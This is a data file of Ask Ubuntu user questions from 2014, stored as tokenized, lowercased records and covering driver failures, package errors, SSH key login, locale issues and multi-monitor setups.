477728	unable to load nvidia driver in 14.04 since update to 3.13.0-27	as mentioned in the title , i 'm no longer able to load ubuntu with the proprietary nvidia drivers since the update to kernel 3.13.0-27 and it is still not working for 29 . the nouveau drivers work fine , but as i 'm using cuda for some applications it wo n't do . i tried to reinstall the drivers on several occasions ( with sudo apt-get purge nvidia* ) but i always boot into the low graphics mode of the login screen and after login unity wo n't load . i 'm using nvidia-331-updates but also tried different versions , but all of them gave me the same results . everything worked fine before the update and even after the update , until 3.13.0-29 i was able to load the drivers by starting with the 3.14.0-24 kernel . this , however , stopped working today with another update . i 've also tried to re-install ubuntu-desktop and unity with no change in result . i 've got an nvidia gtx 570 . any ideas ? here 's the output of lspci -nnk | grep -ia2 vga ( after removing the nvidia drivers ) : vga compatible controller [ 0300 ] : nvidia corporation gf110 [ geforce gtx 570 rev . 2 ] [ 10de:1086 ] ( rev a1 ) subsystem : nvidia corporation device [ 10de:0871 ] kernel driver in use : nouveau and here the output of grep -e ' ( ee ) ' /var/log/xorg.0.log ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 19.612 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 19.652 ] ( ee ) [ drm ] kms not enabled [ 19.652 ] ( ee ) [ drm ] kms not enabled [ 19.652 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 19.652 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 19.652 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 19.652 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 19.667 ] ( ee ) screen 0 deleted because of no matching config section . [ 19.667 ] ( ee ) screen 0 deleted because of no matching config section . [ 19.700 ] ( ee ) fbdev ( 0 ) : fbioblank : invalid argument [ 19.735 ] ( ee ) aiglx : reverting to software rendering [ 20.383 ] ( ee ) fbdev ( 0 ) : fbioblank : invalid argument
477729	can anyone help me fix `` package operation failed '' error on ubuntu 14.04	this error appear when i tried to install package named `` sarge-bandwidthd_2.0.1_i386 '' and its dependency packages like `` libgd2-xpm '' and `` libgd2-noxpm '' . i have never faced with any kind of package operation fail , since i installed ubuntu 14.04 on my system , i had to reinstall ubuntu 14.04 when i see this errors . so dad . and details of this errors following as below . i will apreciate all your helps ! ! ( sorry for my bad english ) installarchives ( ) failed : preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... selecting previously unselected package bandwidthd . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 250104 files and directories currently installed . ) preparing to unpack ... /bandwidthd_2.0.1+cvs20090917-7_i386.deb ... /etc/init.d/bandwidthd : 19 : /etc/init.d/bandwidthd : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` stop '' failed . dpkg : warning : subprocess old pre-removal script returned error exit status 2 dpkg : trying script from the new package instead ... /etc/init.d/bandwidthd : 19 : /etc/init.d/bandwidthd : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` stop '' failed . dpkg : error processing archive /var/cache/apt/archives/bandwidthd_2.0.1+cvs20090917-7_i386.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 2 update-rc.d : warning : /etc/init.d/bandwidthd missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > /etc/init.d/bandwidthd : 19 : /etc/init.d/bandwidthd : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` start '' failed . dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/bandwidthd_2.0.1+cvs20090917-7_i386.deb error in function : dpkg : error processing package bandwidthd ( -- configure ) : package is in a very bad inconsistent state ; you should reinstall it before attempting configuration
477731	overheating problem in ubuntu 14.04	i 'm still having an overheating problem in ubuntu 14.04 . i have heard that the problem would vanish in the new version ( ubuntu 14.04 ) , but my hp pavilion g6 laptop is still overheating . it 's not normal because it 's not overheating in the same way when i 'm using windows 7 . i have done a search , and it seems that the problem is because my laptop has a hybrid graphics card . is it true that it 's because of my hybrid graphics card ? if it is how can i fix it ? if not , what is the cause of the problem and how can i fix it ? the result of lspci | grep vga : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] seymour [ radeon hd 6400m/7400m series ]
477732	run gparted over ssh	i am using a laptop with ubuntu 14.04 and i started building a samba server at home i am using ubuntu-server 14.04 for this machine . i use webmin and ssh ( depending on the job ) to configure my server recently i googled `` run gparted over ssh '' . i did n't knew that was possible , so i gave it a try . i installed gparted ( on server ) but when i enter sudo gparted i get the error : '' gtk-warning ** : can not open display : '' i vainly followed all guides i could find like : http : //www.ossramblings.com/changing-linux-server-partitions-gui i also tried : sudo -e gparted setting x11forwarding yes export display= any other ideas ? thank you all for your time and replies !
477733	i386 ubuntu touch emulator	i follow the touch emulator to create an emulator , and when i try create one with i386 arch with the code : sudo ubuntu-emulator create -- arch=i386 myinstance i get the follow error : unknown flag `arch' more information : $ sudo ubuntu-emulator create -h usage : ubuntu-emulator [ options ] create [ create-options ] creates a new emulator instance name 'name ' by downloading the necessary components from the image server help options : -h , -- help show this help message create new emulator instance named 'name ' : -- channel= select device channel ( ubuntu-touch/devel ) -- server= select image server ( https : //system-image.ubuntu.com ) -- revision= select revision -- use-raw-disk use raw disks instead of qcow2 help options : -h , -- help show this help message $ sudo ubuntu-emulator -h usage : ubuntu-emulator [ options ] help options : -h , -- help show this help message available commands : create create new emulator instance named 'name' destroy destroys an emulator instance named 'name' list lists emulator instances run run emulator instance named 'name' snapshot manipulates snapshots for emulator instance named 'name' $ uname -a linux inspiron 3.13.0-27-generic # 50-ubuntu smp thu may 15 18:06:16 utc 2014 x86_64 x86_64 x86_64 gnu/linux any idea why the arch option is not show and on instructions page exists this option ?
477734	application `` displays '' does not open	i have some problems with using multiple displays with ubuntu . one of the ways to fix it , i found , was to use `` displays '' application . whenever i try to open it , nothing happens . i have tried searching the app through dash , as well as going to system settings . if i double click on `` display '' nothing happens and , just that system settings closes
477737	good free ebook to learn the ubutuntu command line ?	i 'd like to learn a little bit more about the ubuntu command-line ( and the linux in general ) and would like to know if there is any good free ebook or website for this .
477738	can not enable 3d acceleration on ubuntu 14.04 inside virtualbox	i 'm running virtualbox 4.3.12 on macbook pro 15.4 '' with osx 10.9.3 . inside virtualbox i have ubuntu 14.04 ( upgraded from 13.10 ) . i 'm almost sure , that 3d acceleration stopped working after virtualbox upgrade from 4.3.10 version , but it also may be upgrade to 14.04 ( or one of the following packages upgrade ) . i 've following directions from this answer several times , but no luck . output still says that 3d acceleration is not enabled : $ /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) opengl version string : 2.1 mesa 10.1.3 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no i found bug # 12941 in virtualbox bug tracker , but seems it is n't my case since i do n't have any opengl errors . any ideas how to handle this ?
477739	ca n't resolve locale issues with meld	whenever i try to run the programming tool meld i get the following error : traceback ( most recent call last ) : file `` /usr/bin/meld '' , line 75 , in < module > locale.setlocale ( locale.lc_all , '' ) file `` /usr/lib/python2.7/locale.py '' , line 540 , in setlocale return _setlocale ( category , locale ) from what i 've read it appears my locale settings are off , and indeed when i run locale -a i get : locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_collate to default locale : no such file or directory c c.utf-8 posix similarly when i run plain old locale i get : locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_us.utf-8 language= lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all= the problem is , when i try to fix that with a sudo apt-get install language-pack-en-base i get : the following packages have unmet dependencies : language-pack-en-base : depends : locales ( > = 2.3.6 ) but it is not going to be installed and when i try sudo apt-get install locales i get : the following packages have unmet dependencies : libc6 : breaks : locales ( < 2.18 ) but 2.13+git20110622-2 is to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . if i instead try the same thing inside synaptic i see that installing locales would uninstall seemingly every package in my system ( including apt ) ! i thought that perhaps my sources were screwed up so i took out everything except the core `` old-releases.ubuntu.com '' ones , reloaded , and tried again , but that did n't help . so , can anyone please help explain to me how i can either : a ) fix meld without messing around with all this locale stuff ? or b ) get language-pack-en-base to install without taking out the rest of my packages ?
477741	access from a remote server after changing permissions	i have ubuntu on a linux server remotely hosted using amazon web services . i can normally access is using winscp and a private key i have saved on my windows computer . however , trying to add data recently i believe i accidentally changed my home directory permissions to 777 . now i can no longer authenticate using my key because the key on the remote server is now publicly visible , making it unusable . does anyone know how i can access the server another way in order to change back the permissions ?
477742	`` libkmod : error ... . bad line starting with ... .. '' on start-up issue	i am hoping there is someone who can help me out here . after upgrading from 13.10 to 14.04 making sure everything was updated , and newest drivers were in use etc etc etc , i came across the following error : libkmod : error ../libkmod/libmod-config.c:686 kmod_config_parse : /etc/modprobe.d/alsa-base.conf line 45 : ignoring bad line starting with 'snd-hda-intel' i have been able to find some information online regarding this , but nothing too specific . alsa-base.conf has no line that either starts with 'snd-hda-intel ' or contains it , furthermore my alsa-base.conf is only 43 lines . http : //askubuntu.com/questions/29088 ... ne-boot-prompt < - this is almost identical to my error , however like i mentioned , that line does n't exist ! if anyone could point me in the right direction , it would be greatly appreciated ! if you need more information to help , let me know ! i 'm running an asus n550j notebook . thanks , duncan
477749	ubuntu server 14.04 folder sharing and package installation	i need to install few .deb packages to ubuntu server 14.04 running on vmplayer . i have the packages in windows and trying to share the folder . its not happening . i have updated vm tools . tried many methods . there are many packages missing on this version like apt-get is not working . how can i install these ?
477750	ehcp backup restore	i have restored a backup of echp made yesterday , and now i canâ´t access one of my sites www.macsha.com it give me a blank page any idea ? please it 's really urgent ! thank you
477753	ubuntu 14.04 wo n't download apps ?	i have replaced windows 7 with ubuntu 14.04 lts.the problem is i ca n't download any apps from software center . i click on the app and it said `` available from the 'universe ' source '' . i click the button that said `` use this source '' . all it said was `` updating cache querying software sources '' but nothing happens . on top of that , i ca n't use the web browser either . it said `` sever not found '' but my wifi connection is great . i do n't understand .
477756	bash script move file to folders based in name	i hope you can help me ... i made a perl and bash script to make a backup of my firewalls and tranfers via tftp # ! /bin/sh perl /deploy/scripts/backups/10.160.23.1.pl > /dev/null 2 > & 1 perl /deploy/scripts/backups/10.160.23.2.pl > /dev/null 2 > & 1 so this tranfers the file to my tftp directory /tftpboot/ ls -l /tftpboot/ total 532 -rw-rw-rw- 1 tftp tftp 209977 jun 6 14:01 10.160.23.1_20140606.cfg -rw-rw-rw- 1 tftp tftp 329548 jun 6 14:02 10.160.23.2_20140606.cfg my questions is how to improve my script to moving this files dynamically to another folder based on the name ( in this case on the ip address ) for example : 10.160.23.1_20140606.cfg move to /deploy/backups/10.160.23.1/ is that the answer to this surely was on google , but wanted to know if there was a particular solution to this request and also learn how to do : ) thanks !
477757	why is apt-cache so slow ?	after upgrade to trusty ( 14.04 ) from saucy ( 13.10 ) , all apt operations are very slow . even those that do not include downloading anything , or connecting to any servers . for example , displaying the apt policy # time apt-cache policy [ ... ] real 0m8.951s user 0m5.069s sys 0m3.861s takes almost ten seconds ! mostly a weird lag right after issuing the command . and it 's the same even if i issue the same command again . on another system it does n't take a tenth of a second real 0m0.096s user 0m0.070s sys 0m0.023s the other system is a little beefier but there was no noticeable difference before the upgrade . it 's the same with apt-get , anything apt-related . how do i find out the source of this lag and fix it ? additional info : # cat /etc/nsswitch.conf # /etc/nsswitch.conf # # example configuration of gnu name service switch functionality . # if you have the `glibc-doc-reference ' and `info ' packages installed , try : # `info libc `` name service switch '' ' for information about this file . passwd : compat group : compat shadow : compat hosts : files dns networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis btw is my understanding of how apt-cache works correct ? it does n't make any network connections when i run apt-cache policy , right ? in case i 'm wrong and it matters , here are my sources https : //gist.github.com/anonymous/02920270ff68e23fc3ec
477760	managing a laptop with dual graphics cards ?	i understand this question has been asked before , but i 'm still confused as to how it works and if i need to get anything else . initially , this computer had been running windows 7 and i had used it fine . i am now dual booting ubuntu 13.10 . a few days ago i realized i should n't be running at the fps i was running at due to having the nvidia 630m and an intel family graphics card 3000 . i had actually installed a nvidia driver from the website and installed it , and my computer basically went corrupt . i had finally fixed it after ~2 1/2 hours and managed to get back in . here i am , back to where i was , but i just installed bumblebee to manage changing between the cards . i 've installed nothing else relevant to changing graphics cards , or any other drivers . in my system details , my graphics is intel ivybridge mobile . i 'm not sure if i have to run anything or if it runs automatically ( ie ; if i open minecraft , will it use my nvidia automatically ? ) . i have looked at the tutorial and everything , but i just need some things clarified .
477763	how to install skype on ubuntu 14.04	i can not find a skype install package that has been verified as working on ubuntu 14.04 . i used standard skype from their website , and then read that i should use skype from ubuntu software center . there is no obvious skype to choose , and i clicked on a few items in the ubuntu language that i do n't as yet understand , so logically i am now asking for guidance in getting skype installed into ubuntu 14.04 .
477765	ubuntu 14.04 does n't detect my discrete gpu	i recently purchased a laptop with an nvidia geforce 860m , and have installed ubuntu 14.04 . on my old laptop i had 12.04 , which automatically filled additional drivers with nvidia drivers . but on this computer , the only thing in additional drivers is qualcomm . so i manually installed nvidia , but x server settings does n't seem to detect any gpu ... lspci | grep vga reports only my integrated intel gpu , but lspci -v reports many things , including the nvidia gpu : 01:00.0 3d controller : nvidia corporation gm107m [ geforce gtx 860m ] ( rev a2 ) subsystem : asustek computer inc. device 157d flags : fast devsel , irq 16 memory at ec000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at e000 [ size=128 ] expansion rom at ed000000 [ disabled ] [ size=512k ] capabilities : access denied do n't know what any of that means . not sure if it 's supposed to say 'access denied ' ... i need my gpu to do cuda and opengl programming . what else can i do to figure out why this is n't working ? edit : per request , the contents of xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.117 ( buildmeister @ swio-display-x86-rhel47-01 ) tue nov 26 22:29:40 pst 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection
477768	how can i have the home directory for one user on an external drive ?	i want to have the home directory of one user on an external drive and the home directories of all other users in the usual place .
477769	want to replace windows 7 with ubuntu ?	i am looking to replace windows 7 with ubuntu 14.04 but my system configuration is : processor : intel ( r ) atom ( tm ) cpu n550 @ 1.50ghz installed memory ( ram ) : 2.00 gb system type : 32-bit operating system please recommend me how will i get ubuntu 14.04 in my system can you point to a site that can guide through the process
477772	is it possible to set a vpn through tor ? and have functionality for software updates ?	gday , i have been trying to do a software update on trusty both on terminal and software update app but that hasnt been successful , apparently my isp has a broken transparent proxy . moazhmi @ moazhmi-k52f : ~ $ wget -s http : //extras.ubuntu.com/ubuntu/dists/trusty/inrelease -- 2014-06-04 17:34:52 -- http : //extras.ubuntu.com/ubuntu/dists/trusty/inrelease resolving extras.ubuntu.com ( extras.ubuntu.com ) ... 91.189.92.152 connecting to extras.ubuntu.com ( extras.ubuntu.com ) |91.189.92.152|:80 ... connected . http request sent , awaiting response ... http/1.1 200 ok content-type : text/html ; charset=utf-8 content-length : 213 date : wed , 04 jun 2014 14:34:52 gmt server : apache/2.2.22 ( ubuntu ) connection : keep-alive vary : accept-encoding length : 213 [ text/html ] saving to : ‘inrelease’ 100 % [ ====================================== > ] 213 -- .-k/s in 0s 2014-06-04 17:34:52 ( 22.1 mb/s ) - ‘inrelease’ saved [ 213/213 ] i was advised to refer back to the isp with a complaint but that has returned with peanuts . my question is - is it possible to set a vpn through tor , i.e whereas i can run software updates through terminals or the app . the browsing is out of question here as i need to update which i am not able to do / only on 12.04 .
477776	\0 for the usb-lan adapter device name for netfilter library	i have a network emulator which works on top of linux 's netfilter . it uses the user-space library to build a simple emulator , which gets traffic from the machine 's lan device ( eth0 ) , and forwards it to my wireless router given a nat that is defined via a usb-lan adapter , showed as `` eth1 '' on ifconfig . so basically the emulator gets a packet from the input interface , and forwards it to its output device . but the thing is that for each packet , it shows pck.indev as eth0 , but pck.outdev is \0 . i guess it should be because of using the usb adapter . however it works and forwards it to so called `` \0 '' , but does anybody know where the problem is coming from ? how can i fix the naming issue correctly to `` eth1 '' ?
477779	document sorting section	i have some sample data below ( call it test.txt ) . i would like to split this big document into 3 documents by searching the first two digits in the 4th column . i 'm pretty new with linux ( lubuntu 14.04 ) and have looked into 'csplit ' and 'awk ' but ca n't seem to get the syntax down for either . ( i 'm writing bash scripts ) before : test.txt 12-1-2014 allow 00:00:00 00:00:00 12-1-2014 allow 00:00:00 00:00:00 12-2-2014 allow 01:00:00 01:00:00 12-10-2014 deny 01:00:00 01:00:00 12-10-2014 deny 02:00:00 02:00:00 12-11-2014 deny 02:00:00 02:00:00 after : test1.txt 12-1-2014 allow 00:00:00 00:00:00 12-1-2014 allow 00:00:00 00:00:00 test2.txt 12-2-2014 allow 01:00:00 01:00:00 12-10-2014 deny 01:00:00 01:00:00 test3.txt 12-10-2014 deny 02:00:00 02:00:00 12-11-2014 deny 02:00:00 02:00:00
477783	files being wiped by cloud storage services	when i move and rename files using ubuntu one or grive tools , using an ssd , sometimes clients does n't catch the change properly and delete or make to reappear missing folders . why it could be that ?
477784	blank frame around screen with laptop + external monitor setup using amd propietary drivers	i have a laptop with an ati radeon hd 7520g , and i 'm using the propietary amd drivers ( fglrx ) . the issue is that when i connect an hdmi 23 ' widescreen monitor ( appears as dpf1 on xrandr ) on 1920x1080 , the screen shows a blank frame , like the 'viewable ' part of the monitor shrunk . this does n't happen when i plug in a 22 ' monitor via vga , and did n't show at all using opensource drivers . that 's a shame because the proprietary drivers solved another problem where after closing the laptop lid the laptop screen will be blank . thoughts ?
477785	retrieve the password in command mode	i ca n't current password . how to set new password in linux command line on ubuntu 12.04 ?
477786	vm connected to openvswitch can not access the external network on ubuntu 14.04	i have a computer running ubuntu 14.04 . it has two ethernet interfaces . i 've created a virtual switch and connected eth1 to it . i run vm ( kvm ) that connects to the openswitch bridge . from the host , i can ping the guest that runs in the vm . from the host i can also access the external network connected to eth1 . however , i can not ping from the guest os to the external network . any idea how to solve/troubleshoot this ? benny
477788	what does make distclean do ?	i 'm new to compilation . i 'm installing ffmpeg and there 's a make distclean ( or once there was make clean ) after every step . what does it do ?
477790	how to set multiple nameservers in /etc/resolv.conf which sticks on reboot ?	ubuntu 14.04 server edition only displays `` nameserver 127.0.0.1 '' in `` /etc/resolv.conf '' on each reboot if the dns-nameservers in `` /etc/network/interfaces '' contains 127.0.0.1 and some other dns such as google public dns . on /etc/network/interfaces i set as follows : dns-nameservers 127.0.0.1 8.8.8.8 but after a reboot , /etc/resolv.conf gives me this : nameserver 127.0.0.1 should n't the `` nameserver 8.8.8.8 '' listed in the /etc/resolv.conf too ? thanks in advanced .
477795	computer frozen after upgrade	i logged on to ubuntu this morning as normal.there was a new upgrade notice . like i have a couple of times a week for the past three years , i was asked if i wanted to upgrade . i said yes , the systems downloaded the patch files . after a few minutes , it said i needed to reboot which i did . after rebooting , the system partially froze on startup . i can move the mouse but not am not able to click on any apps . just a white cursor ... using ctrl-alt-f1 , i am able to open a terminal . my question is the following : from the command line , can i undo the upgrade that seemed to have caused the problem . thanks for any help .
477796	system powers off when trying to upgrade from 11.10 or install packages	so , i recently installed ubuntu 11.10 on an old laptop and i was going to upgrade to 12.04 , but for some reason , whenever i try to , the computer itself just literally powers off without any kind of warning , i was thinking it was just the battery , but even having it plugged into the wall without the battery produces the issue . i 've also noticed that the same thing happens whenever i try to install packages such as chromium and skype . if anyone has any idea why this is doing this , that 'd be great .
477801	raid10 : why resync takes huge amound of time ?	after setting up raid10 and installing ubuntu , i reboot then check /proc/mdstat . it shows [ > ... ] resync = 2 % finish=29702.5min speed=1030k/sec '' . that is about 500 hours or 20 more days . is there anything wrong ? the array has 4 drives with 1 tb each . another thing i noticed is when i boot the system rescue , now the result seems normal with resync takes about 142 minutes , really weird . is it because when the system is running it will take significantly more time to resync ?
477802	how to create a new user defined command to kill processes using process name ?	suppose i wanted to kill firefox , i just write pidof fi ( press tab ) refox ( appears on its own ) , then i write ' kill 'id given by pidof ' ' on terminal . i know that i can write 'kill `pidof firefox` ' but the autocomplete does not work . so i wanted a command like mykill firefox ( on which tab completion also work ) which on the background runs 'kill `pidof firefox` ' mykill process name ( with tab completion ) - > kill `pidof process name`
477809	how to export observium data ?	trying to figure out how to export the data from observium to see the throughput of a network , and save it to a file . any help would be great .
477812	ssh pair key authentication problem	i have a problem with public and private key authentication . i do this steps and then , public-key based does n't work . 1- generate a pair of private and public key ( rsa ) using the following command : generating public/private rsa key pair . enter file in which to save the key ( /home/rc_ss/.ssh/id_rsa ) : created directory '/home/rc_ss/.ssh ' . enter passphrase ( empty for no passphrase ) : enter same passphrase again : your identification has been saved in /home/rc_ss/.ssh/id_rsa . your public key has been saved in /home/rc_ss/.ssh/id_rsa.pub . the key fingerprint is : ac : fd : d1:2e : e5:1e : db:87:98:77:9e:14:62 : db:97 : f0 rc_ss @ rc_ss-network the key 's randomart image is : + -- [ rsa 2048 ] -- -- + | | | | | | | . | | s + . | | o .o * o| | . . .oo+ e.| | ..o+++ =| | .o+..=.| + -- -- -- -- -- -- -- -- -+ 2- copy it through network with ssh-copy-id as follows rc_ss @ rc_ss-network : ~ $ ssh-copy-id -i .ssh/id_rsa.pub root @ 192.168.2.100 the authenticity of host '192.168.2.100 ( 192.168.2.100 ) ' ca n't be established . ecdsa key fingerprint is 33:67 : e0:02 : b1:10:46:76:78:6b:1f : e2:55:9b:6a : a8 . are you sure you want to continue connecting ( yes/no ) ? yes warning : permanently added '192.168.2.100 ' ( ecdsa ) to the list of known hosts . root @ 192.168.2.100 's password : now try logging into the machine , with `` ssh 'root @ 192.168.2.100 ' '' , and check in : ~/.ssh/authorized_keys to make sure we have n't added extra keys that you were n't expecting . 3- then , i want to get connected to server ssh without password , and deal with following : rc_ss @ rc_ss-network : ~ $ ssh root @ 192.168.2.100 root @ 192.168.2.100 's password : which means the password required yet . can anybody help me ? appreciate it .
477814	software center crashes on startup	edit : here 's why i disagree with the dupe status : i have different symptoms . the dupe required a force close . mine crashes silently and dies before the gui even appears . all i see when starting from the gui is the bug-reporting dialog . edit 2 : the ubuntu-bug utility wo n't start , either -- here 's the output : edit 3 : i filed a bug against gobject-introspection here . a copy of the original posting is below this . $ ubuntu-bug software-center error : root : could not find any typelib for wnck error : root : could not find any typelib for gdkx11 error : root : could not find any typelib for gdk traceback ( most recent call last ) : file `` /usr/share/apport/apport-gtk '' , line 16 , in < module > from gi.repository import gobject , glib , wnck , gdkx11 , gdk importerror : can not import name 'wnck' this looks like a broken gi.repository module . i obviously could n't start ubuntu software center through the gui , so i tried to run it through the command line . here 's what happened . $ software-center error : root : could not find any typelib for gtk traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 25 , in < module > from gi.repository import gtk , gobject importerror : can not import name gtk i 've tried sudo apt-get install -- reinstalling several relevant packages/dependencies to no avail , namely : software-center libgirepository-1.0-1 gir1.2-pango-1.0 ( fixed an identical debian issue ) from reading online , it does n't exactly seem specific to this package or ubuntu . here 's a list of other potentially related issues : http : //stackoverflow.com/q/22139911/2693146 ( windows ) https : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=725134 ( fixed by an update , unsure of the actual change ) https : //code.google.com/p/quodlibet/issues/detail ? id=1238 ( older , debian-specific ) i only started getting this error about a month or so ago . what should i do to fix this ? ( copy of initial post of bug ) both `software-center` and `ubuntu-bug` fail to start because of a failed import statement , all starting with the following : `from gi.repository import ` . the offending error messages for each package : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - $ software-center error : root : could not find any typelib for gtk traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 25 , in from gi.repository import gtk , gobject importerror : can not import name gtk -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- $ ubuntu-bug software-center error : root : could not find any typelib for wnck error : root : could not find any typelib for gdkx11 error : root : could not find any typelib for gdk traceback ( most recent call last ) : file `` /usr/share/apport/apport-gtk '' , line 16 , in from gi.repository import gobject , glib , wnck , gdkx11 , gdk importerror : can not import name 'wnck' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - here 's the output i got from the following python repl commands : > > > import gi.repository > > > dir ( gi.repository ) [ '__builtins__ ' , '__doc__ ' , '__file__ ' , '__name__ ' , '__package__ ' , '__path__ ' , 'absolute_import ' ] > > > for i in dir ( gi.repository ) : print ( i , '' `` , type ( getattr ( gi.repository , i ) ) ) ( 'glib ' , ' ' , < class 'gi.module.dynamicmodule ' > ) ( 'gobject ' , ' ' , < class 'gi.module.dynamicmodule ' > ) ( '__builtins__ ' , ' ' , < type 'dict ' > ) ( '__doc__ ' , ' ' , < type 'nonetype ' > ) ( '__file__ ' , ' ' , < type 'str ' > ) ( '__name__ ' , ' ' , < type 'str ' > ) ( '__package__ ' , ' ' , < type 'str ' > ) ( '__path__ ' , ' ' , < type 'list ' > ) ( 'absolute_import ' , ' ' , < type 'instance ' > ) the reason i 'm filing against this package is because of it being a common dependency . some necessary info : $ lsb_release -rd description : ubuntu 14.04 lts release : 14.04 $ apt-cache policy libgirepository-1.0-1 libgirepository-1.0-1 : installed : 1.40.0-1ubuntu0.1 candidate : 1.40.0-1ubuntu0.1 version table : *** 1.40.0-1ubuntu0.1 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages 100 /var/lib/dpkg/status 1.40.0-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages
477816	two 4k displays	i want to set up my machine with two 4k displays . for that , i need to have a separate graphic card for each display as the display port only supports one monitor with this resolution . i have two of these graphic cards : gefore vga compatible controller : nvidia corporation gk104 [ geforce gtx 760 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : micro-star international co. , ltd. [ msi ] device 2847 flags : bus master , fast devsel , latency 0 , irq 47 memory at f4000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at d8000000 ( 64-bit , prefetchable ) [ size=128m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at d000 [ size=128 ] [ virtual ] expansion rom at f5000000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 ] virtual channel capabilities : [ 128 ] power budgeting < ? > capabilities : [ 600 ] vendor specific information : id=0001 rev=1 len=024 < ? > kernel driver in use : nvidia whats working is that i can set up one 4k display and a 1920 display on the first card . i also can use xinerama from the nvidia-settings to get the two displays working together on the different graphic cards . but using the xinerama setting my systems tells me i do not have any opengl support any more . if i want to open the display `` tool '' this is not working . is there any way to keep the 3d support ( e.g . for gaming ) and to use two different graphic cards ? br , pingu
477821	how can i permanently remove the boot option `` quiet splash '' ?	when booting , i 'd like to see the kernel output without having to edit the grub line on each boot . how can i do that ?
